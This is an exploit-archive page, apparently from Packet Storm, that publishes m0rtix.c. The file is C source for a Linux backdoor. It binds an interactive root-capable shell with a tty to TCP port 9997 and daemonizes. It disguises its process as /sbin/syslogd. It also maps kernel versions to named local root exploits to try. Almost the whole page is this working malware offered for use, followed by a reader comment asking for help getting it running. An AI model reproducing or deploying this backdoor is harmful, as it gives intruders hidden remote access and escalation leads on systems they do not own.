exploit the possibilities

m0rtix.c

m0rtix.c
Posted Apr 29, 2006
Authored by jeremy still

m0rtix.c is a simple C linux backdoor which bind a shell to a port with tty fork. The processes are hidden and it contains a kernel version detector which tell you what local root exploit you must use to root the system.

tags | tool, shell, kernel, local, root, rootkit
systems | linux, unix
MD5 | 6503eae7a42fb2d5336a3a0cde0c5bb0

m0rtix.c

Change Mirror Download
/* r0nin v3.0 by m0rtix */      

//////////////////////////////////////////////////////////////////
// Bind port, "ps aux" masked, Tell u if rootab or no etc... //
// //
// m0rtix (c) 2006 //
// irc.epiknet.org #hakin9 //
// //
// Une petite pensée pour Sympt0me.... //
//reloaded_matrix_revolutions@hotmail.com //
//////////////////////////////////////////////////////////////////

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <pwd.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>

#include <sys/resource.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <sys/wait.h>



#define MASK "/sbin/syslogd"
#define HOME "/"
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ 0x5413
#define TIOCSWINSZ 0x5414
#define ECHAR 0x1d
#define BUF 32768
#define PORT 9997

int leserver(void);
int rootab(void);
int noroot(void);
int kwst(void);
int oslinux(void);
int bsdbsd(void);



int main(int argc, char *argv[]) {



//have the current user in bash !!!

int uid = getuid();
struct passwd *pwd_str;
pwd_str = getpwuid(uid);
char *login;
login = malloc(strlen(pwd_str->pw_name));
strncpy(login, pwd_str->pw_name, strlen(pwd_str->pw_name));

//have the current kernel version !!!!

struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

//to be hidden for "PS" command:
strcpy(argv[0], MASK);

fprintf(stdout, "\n\t ,--. | o ");
fprintf(stdout, "\n\t,-.-.| |,---.|--- .. , ");
fprintf(stdout, "\n\t| | || || | | >< ");
fprintf(stdout, "\n\t` ' '`--'` `---'`' ` \n");

fprintf(stdout, "\nPsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = %ld\n", (long)getpid());

fprintf(stdout, "Shell on: 9997 User: %s UID: %ld\n", login, (long)getuid());
fprintf(stdout, "Name: %s (Masked in PS! ) v: = %s %s %s\n\n", argv[0], bof->sysname, bof->nodename, bof->release);

kwst();
leserver();



return 0;
}

//////////////////////////////


//LESERVER - listen on 9997 port and give U a shell...

struct winsize {
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
};

/////////////////////////////////////////////////:

void get_tty(int num, char *base, char *buf)
{
char series[] = "pqrstuvwxyzabcde";
char subs[] = "0123456789abcdef";
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}


/////////////////////////////////////////////

int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;

fd = open("/dev/ptmx", O_RDWR);
close(fd);

for (i=0; i < 256; i++) {
get_tty(i, "/dev/pty", buf);
*pty = open(buf, O_RDWR);
if (*pty < 0) continue;
get_tty(i, "/dev/tty", buf);
*tty = open(buf, O_RDWR);
if (*tty < 0) {
close(*pty);
continue;
}
return 1;
}
return 0;
}

///////////////////////////////////////////////////

void sig_child(int i)
{
signal(SIGCHLD, sig_child);
waitpid(-1, NULL, WNOHANG);
}

//////////////////////////////////////////////////:

void hangout(int i)
{
kill(0, SIGHUP);
kill(0, SIGTERM);
}

/////////////////////////////////////////////////////

int leserver(void) {
int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("socket");
return 1;
}

bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(port);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
perror("bind");
return 1;
}
if (listen(sock, 5) < 0) {
perror("listen");
return 1;
}

fflush(stdout);

/* daemonize */
setsid();
chdir("/");
pid = open("/dev/null", O_RDWR);
dup2(pid, 0);
dup2(pid, 1);
dup2(pid, 2);
close(pid);
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, sig_child);
while (1) {
int scli;
int slen;
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli, &slen);
if (scli < 0) continue;
pid = fork();
if (pid == 0) {
int subshell;
int tty;
int pty;
fd_set fds;
char buf[BUF];
char *argv[] = {"sh", "-i", NULL};
#define MAXENV 256
#define ENVLEN 256
char *envp[MAXENV];
char envbuf[(MAXENV+2) * ENVLEN];
int j, i;
char home[256];

/* setup enviroment */
envp[0] = home;
sprintf(home, "HOME=%s", HOME);
j = 0;
do {
i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
envp[j+1] = &envbuf[j * ENVLEN];
j++;
if ((j >= MAXENV) || (i < ENVLEN)) break;
} while (envbuf[(j-1) * ENVLEN] != '\n');
envp[j+1] = NULL;

/* create new group */
setpgid(0, 0);

/* open slave & master side of tty */
if (!open_tty(&tty, &pty)) {
char msg[] = "Can't fork pty, bye!\n";
write(scli, msg, strlen(msg));
close(scli);
exit(0);
}
/* fork child */
subshell = fork();
if (subshell == 0) {
/* close master */
close(pty);
/* attach tty */
setsid();
ioctl(tty, TIOCSCTTY);
/* close local part of connection */
close(scli);
close(sock);
signal(SIGHUP, SIG_DFL);
signal(SIGCHLD, SIG_DFL);
dup2(tty, 0);
dup2(tty, 1);
dup2(tty, 2);
close(tty);
execve("/bin/sh", argv, envp);
}
/* close slave */
close(tty);

signal(SIGHUP, hangout);
signal(SIGTERM, hangout);

while (1) {
/* watch tty and client side */
FD_ZERO(&fds);
FD_SET(pty, &fds);
FD_SET(scli, &fds);
if (select((pty > scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < 0)
{
break;
}
if (FD_ISSET(pty, &fds)) {
int count;
count = read(pty, buf, BUF);
if (count <= 0) break;
if (write(scli, buf, count) <= 0) break;
}
if (FD_ISSET(scli, &fds)) {
int count;
unsigned char *p, *d;
d = buf;
count = read(scli, buf, BUF);
if (count <= 0) break;

/* setup win size */
p = memchr(buf, ECHAR, count);
if (p) {
unsigned char wb[5];
int rlen = count - ((ulong) p - (ulong) buf);
struct winsize ws;

/* wait for rest */
if (rlen > 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(scli, &wb[rlen], 5 - rlen);
}

/* setup window */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] << 8) + wb[4];
ioctl(pty, TIOCSWINSZ, &ws);
kill(0, SIGWINCH);

/* write the rest */
write(pty, buf, (ulong) p - (ulong) buf);
rlen = ((ulong) buf + count) - ((ulong)p+5);
if (rlen > 0) write(pty, p+5, rlen);
} else
if (write(pty, d, count) <= 0) break;
}
}
close(scli);
close(sock);
close(pty);

waitpid(subshell, NULL, 0);
vhangup();
exit(0);
}
close(scli);
}
}

////////////////////////////////////////////////////////////////////////



//END LESERVER


/////////////////////////////////////

//KWST - rootab ??????????
int kwst(void) {

struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *osdev = bof->sysname;

if (strcmp(osdev, "Linux") == 0)
oslinux(); else { if(strcmp(osdev, "FreeBSD") == 0) {
bsdbsd(); }}

return 0; }
//END KWST

//////////////////////////////////////

//OSLINUX - if is Linux:

int oslinux(void) {

///////////////// THanks to Anissina_Keiko ///////////////////////////////


struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *kernelver = bof->release;

//////////////////////////////////////////// KERNEL 2.2.* //////////////////

if (strncmp(kernelver, "2.2.", 4) == 0)
{
printf("\nRootab !! use: ptrace!");
}
//////////////////////////////////////////// KERNEL 2.4.* //////////////////
else if(strncmp(kernelver, "2.4.17", 6) == 0)
{
printf("\nRootab !! use: Kmod, newlocal !");
} else if (strncmp(kernelver, "2.4.18", 6) == 0)
{
printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.19", 6) == 0)
{
printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.20", 6) == 0)
{
printf("\nRootab !! use: elflbl, Ptrace, Brk2, w00t(if 2003), Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.21", 6) == 0)
{
printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Krad3(if elSMP), Kmod2 !");
} else if (strncmp(kernelver, "2.4.22", 6) == 0)
{
printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Kmod2 !");
} else if (strncmp(kernelver, "2.4.23", 6) == 0)
{
printf("\nRootab !! use: mremap_pte!");
} else if (strncmp(kernelver, "2.4.24", 6) == 0)
{
printf("\nRootab !! use: mremap_pte!");
} else if (strncmp(kernelver, "2.4.25", 6) == 0)
{
printf("\nRootab !! use: mremap_pte, Uselib24!");
} else if (strncmp(kernelver, "2.4.26", 6) == 0)
{
printf("\nRootab !! use: mremap_pte, Uselib24!");
} else if (strncmp(kernelver, "2.4.27", 6) == 0)
{
printf("Rootab !! use: don't know lol!\n");
}
//////////////////////////////////////////////////// KERNEL 2.6.* ///////////////////
else if (strncmp(kernelver, "2.6.2", 5) == 0)
{
printf("\nRootab !! use: expand_stack, mremap_pte!");
} else if (strncmp(kernelver, "2.6.3", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.4", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.5", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.6", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.7", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.8", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.9", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.10", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.11", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.12", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad2(if 2004) !");
} else if (strncmp(kernelver, "2.6.13", 5) == 0)
{
printf("\nRootab !! use: expand_stack !");
} else if (strncmp(kernelver, "2.6.14", 5) == 0)
{
printf("\nRootab !! use: expand_stack !");
} else if (strncmp(kernelver, "2.6.15", 5) == 0)
{
printf("\nRootab !! use: expand_stack !");
} else
{
printf("\nDon't know for ths version: %s\n", kernelver);
}

return 0;
}

//END OS

/////////////////////////////////////////

//BSDBSD If FreeBSD:

int bsdbsd(void) {
fprintf(stdout, "\n\t Oh NOoo !!! it's a FreeBSD system, i can't say you if this sheat is rootab !!\n\n");
return 0;
}

//BSDBSD END

////////////////////////////////////////////

Comments (1)

RSS Feed Subscribe to this comment feed
userx

Here, i get a problem...when I try to connect to server with nc a get a message: "can't create pty!!!"

or something like this..

I want to make a simple bind shell with tty, but it seems so hard to make it works...
can you help me?

my email is: userx.gnu@gmail.com

Thanks for everything anyway

Comment by userx
2012-07-10 18:50:23 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close